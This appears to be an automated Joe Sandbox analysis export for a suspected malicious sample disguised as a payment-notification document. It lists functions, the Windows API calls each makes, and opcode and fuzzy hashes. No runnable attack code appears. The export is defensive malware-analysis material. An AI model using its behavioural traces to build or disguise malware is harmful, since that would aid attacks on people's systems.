Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 574a979e7aafd06ded28a0c0da40191bcbf4233c4145b1e22a5ab34a011aae1b
Instruction ID: 508432495633dd653762fe38d44115f80a5e54342a25c66874692da89165a47c
Opcode Fuzzy Hash: 574a979e7aafd06ded28a0c0da40191bcbf4233c4145b1e22a5ab34a011aae1b
Instruction Fuzzy Hash: AF317FB1604305AFDB24DFA6C8849ABBBFDFF04352B10442EF916D2101DB30ED449B60

Function 00941901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00941915
PostMessageW.USER32(00000001,00000201,00000001), ref: 009419C1
Sleep.KERNEL32(00000000,?,?,?), ref: 009419C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 009419DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 009419E2

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: a286c5a6f86b50f3e15dc8a40ad3c192255ce75d9e8dac6e4e6035766e7cafd0
Instruction ID: fe1e6838e1c0f325e64d3272efd3ff774aba08150a079763539a274a42582389
Opcode Fuzzy Hash: a286c5a6f86b50f3e15dc8a40ad3c192255ce75d9e8dac6e4e6035766e7cafd0
Instruction Fuzzy Hash: 7E31C072A14219EFCB04CFA8DD99EDE3BB5EB44315F104229F925AB2D1C7709984DB90

Function 00975706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00975745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0097579D
_wcslen.LIBCMT ref: 009757AF
_wcslen.LIBCMT ref: 009757BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00975816

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 942df0691dac8faaf143383c369292fb61458ee1d6410036df732944cbd4360b
Instruction ID: 8b12277b6bb1fb7b13b0bf8a6a7f1b1b98bdbd5637d28e09b52daea4f56f6940
Opcode Fuzzy Hash: 942df0691dac8faaf143383c369292fb61458ee1d6410036df732944cbd4360b
Instruction Fuzzy Hash: 3121D2729046089ADB609FA0CC85AEE77BCFF40720F10C21AEA2DEA1C0D7B08981CF50

Function 008F990E Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008F98CC
SetTextColor.GDI32(?,?), ref: 008F98D6
SetBkMode.GDI32(?,00000001), ref: 008F98E9
GetStockObject.GDI32(00000005), ref: 008F98F1
GetWindowLongW.USER32(?,000000EB), ref: 008F9952

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 2cca7308e0a7a1e92971f92b2c22714d13db947240e10683488c91424a150298
Instruction ID: d2f90b4038722319519e87bf04b57b334fdcc00cb3c661012061e361edde8d38
Opcode Fuzzy Hash: 2cca7308e0a7a1e92971f92b2c22714d13db947240e10683488c91424a150298
Instruction Fuzzy Hash: CA21F2726992449FC7228F74EC54BF93F60EB13331B04026DEA968A1A1C7764982DB51

Function 00960930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00960951
GetForegroundWindow.USER32 ref: 00960968
GetDC.USER32(00000000), ref: 009609A4
GetPixel.GDI32(00000000,?,00000003), ref: 009609B0
ReleaseDC.USER32(00000000,00000003), ref: 009609E8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 48af42d596322861d6aff966ff588bd9b50558e3750bd2f8d0e5d52b1ee6e5b9
Instruction ID: dbe0de24ec2ff76db63024613189ebb2aa3f6e947fe944568d7bc7361ac94bf2
Opcode Fuzzy Hash: 48af42d596322861d6aff966ff588bd9b50558e3750bd2f8d0e5d52b1ee6e5b9
Instruction Fuzzy Hash: 58219F76600204AFD704EF69C985AAEBBE9EF85741F00842CE84AE7362CB70AD44DB50

Function 0091CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0091CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0091CDE9

Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0091CE0F
_free.LIBCMT ref: 0091CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0091CE31

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 1efa36b4a3ac340fbef68b5db0035eb72af6654fdef5d59d08fb27407d573a15
Instruction ID: 626ce74f738f4fc55736fc79b7a7c198e95748ace21371676416f041681a778a
Opcode Fuzzy Hash: 1efa36b4a3ac340fbef68b5db0035eb72af6654fdef5d59d08fb27407d573a15
Instruction Fuzzy Hash: A701F7F37452197F232116BA6C8DDBF7A6DDFC6BA1315012DFD09C7200EA608D8191B0

Function 008F9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
SelectObject.GDI32(?,00000000), ref: 008F96A2
BeginPath.GDI32(?), ref: 008F96B9
SelectObject.GDI32(?,00000000), ref: 008F96E2

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 534cdf23a0c076e34f33359e2667e4a3741d971f3f39b10cda10b013eb272c40
Instruction ID: b4fb2abca25449fdf954f9d65f4212f9867786eae23d47584dce82b1d7dfd3cc
Opcode Fuzzy Hash: 534cdf23a0c076e34f33359e2667e4a3741d971f3f39b10cda10b013eb272c40
Instruction Fuzzy Hash: D121B07182A349EBDB119F68FD247B93BA8FB20366F50031AF554E60B0D3745881EF94

Function 00945711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00945726
_memcmp.LIBVCRUNTIME ref: 00945744
_memcmp.LIBVCRUNTIME ref: 00945757
_memcmp.LIBVCRUNTIME ref: 0094576F
_memcmp.LIBVCRUNTIME ref: 00945787

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 5989b6251be0f78f5255385bdb5b4acbd80254bdbe96670d3654a542fa0e147a
Instruction ID: 0ffdbbd939879d9aebc86e3ea2005f8adbc756a0ef9b475c3e31d3f5d7372ef9
Opcode Fuzzy Hash: 5989b6251be0f78f5255385bdb5b4acbd80254bdbe96670d3654a542fa0e147a
Instruction Fuzzy Hash: 1B01B9B2641605BFE20855509E52FBB739CABA1398F058031FD0CAA282F764EE11C3B1

Function 00912DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6), ref: 00912DFD
_free.LIBCMT ref: 00912E32
_free.LIBCMT ref: 00912E59
SetLastError.KERNEL32(00000000,008E1129), ref: 00912E66
SetLastError.KERNEL32(00000000,008E1129), ref: 00912E6F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c7b0d3b8f83e11c0abe2335de0048a4a01bd08931014ea000a02a053048623f5
Instruction ID: b17615d01fd19824f1dac15230fca2f124afa6da502861dbc2dee5f6b81b52ed
Opcode Fuzzy Hash: c7b0d3b8f83e11c0abe2335de0048a4a01bd08931014ea000a02a053048623f5
Instruction Fuzzy Hash: 7A01287334960C6BC61237346C85EEB266DAFC23B5B60442CF829E61D2EF348CF15060

Function 0094000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?,?,0094035E), ref: 0094002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?), ref: 00940064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940070

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: f8bb5ca6811b50af588d5880d41eb1337112181ae6482631876029e8785cb0e8
Instruction ID: c18d58b5a6c4ad8ee0da0b72df27c2adcabf2529e8c666759888f23a28b57241
Opcode Fuzzy Hash: f8bb5ca6811b50af588d5880d41eb1337112181ae6482631876029e8785cb0e8
Instruction Fuzzy Hash: CE018FB2610204BFDB204F68DC04FAA7BADEB84791F144128FE09D2210D775DE80DBA0

Function 0094E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0094E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0094E9A5
Sleep.KERNEL32(00000000), ref: 0094E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0094E9B7
Sleep.KERNEL32 ref: 0094E9F3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: cbf754440b627041a1157663e2db19ac242ff1e9e714f82b3a2e558f4c379165
Instruction ID: 0bf797a937c16d67713205882244b934df62ec4328805acbbd4fcd539a6e9371
Opcode Fuzzy Hash: cbf754440b627041a1157663e2db19ac242ff1e9e714f82b3a2e558f4c379165
Instruction Fuzzy Hash: CC019E72C19A2EDBCF00AFE4DC49AEDBB78FF08310F40055AE502B2281DB349590DBA1

Function 009410F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 93399809475daf54d8498944f93d6993005413994d41b0db2f888147b2e6b70e
Instruction ID: ed6346fd8692685e4d7d4c83714fbf53ed507eba377ff6f2212bea9e3ac00f2c
Opcode Fuzzy Hash: 93399809475daf54d8498944f93d6993005413994d41b0db2f888147b2e6b70e
Instruction Fuzzy Hash: 1B0131B6114205BFDB154F65DC49E6A3F6EEF89361B104429FA45D7350DB31DC809A60

Function 00940FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00940FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00940FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00940FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00940FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00941002

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ca85b77050feb5228ab05040ce64152c46affd6301037309646a520e9634cd98
Instruction ID: e7d01d534c846caee412c99bf48947b763ae9d983ce9903fa4080c7e4c346a49
Opcode Fuzzy Hash: ca85b77050feb5228ab05040ce64152c46affd6301037309646a520e9634cd98
Instruction Fuzzy Hash: AAF06DB6214301EBDB214FA4EC4DF563FADEF89762F504428FA49D7261CA70DC809A60

Function 00941014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0094102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00941036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0094104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941062

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0526d5b865e0f7ca91364b8d56c48d4956a15b882582acc7370e38ae72f99848
Instruction ID: 845ccc00898175af95d6fcc694a3bc34dcc834dc8c12411eb1bc6339fbf3fc6a
Opcode Fuzzy Hash: 0526d5b865e0f7ca91364b8d56c48d4956a15b882582acc7370e38ae72f99848
Instruction Fuzzy Hash: 22F06DB6214301EBDB215FA4EC49F563BADEF89761F100428FA49D7250CA70D8909A60

Function 0095030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950324
CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950331
CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 0095033E
CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 0095034B
CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950358
CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950365

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c04de8c8e2adf7f28af8dcea626165b70e5ec8f42d91d86613a8c86b1f5e835a
Instruction ID: 2ceb5a422ff7c3d032fe594fda05a4a2b93cb980ba97cec1c53c83533914205d
Opcode Fuzzy Hash: c04de8c8e2adf7f28af8dcea626165b70e5ec8f42d91d86613a8c86b1f5e835a
Instruction Fuzzy Hash: DC01AE72800B15DFCB30AF66D880812FBF9BFA03163158A3FD19652931C3B1A998DF80

Function 0091D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0091D752

Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0

_free.LIBCMT ref: 0091D764
_free.LIBCMT ref: 0091D776
_free.LIBCMT ref: 0091D788
_free.LIBCMT ref: 0091D79A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 57c80ad64519f1f325c331dfd196f2fb1b6b6343fa623c6867d2f3cbde04462c
Instruction ID: f680bdb2b7392eaf05f09c818a31605aacf63cf8a313925b7ecf0395d928e8a8
Opcode Fuzzy Hash: 57c80ad64519f1f325c331dfd196f2fb1b6b6343fa623c6867d2f3cbde04462c
Instruction Fuzzy Hash: 86F04FB271520CAB8625FB6CFAC5D9677DDBF85720B940805F058DB541CB24FCD086A0

Function 00945C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00945C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00945C6F
MessageBeep.USER32(00000000), ref: 00945C87
KillTimer.USER32(?,0000040A), ref: 00945CA3
EndDialog.USER32(?,00000001), ref: 00945CBD

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

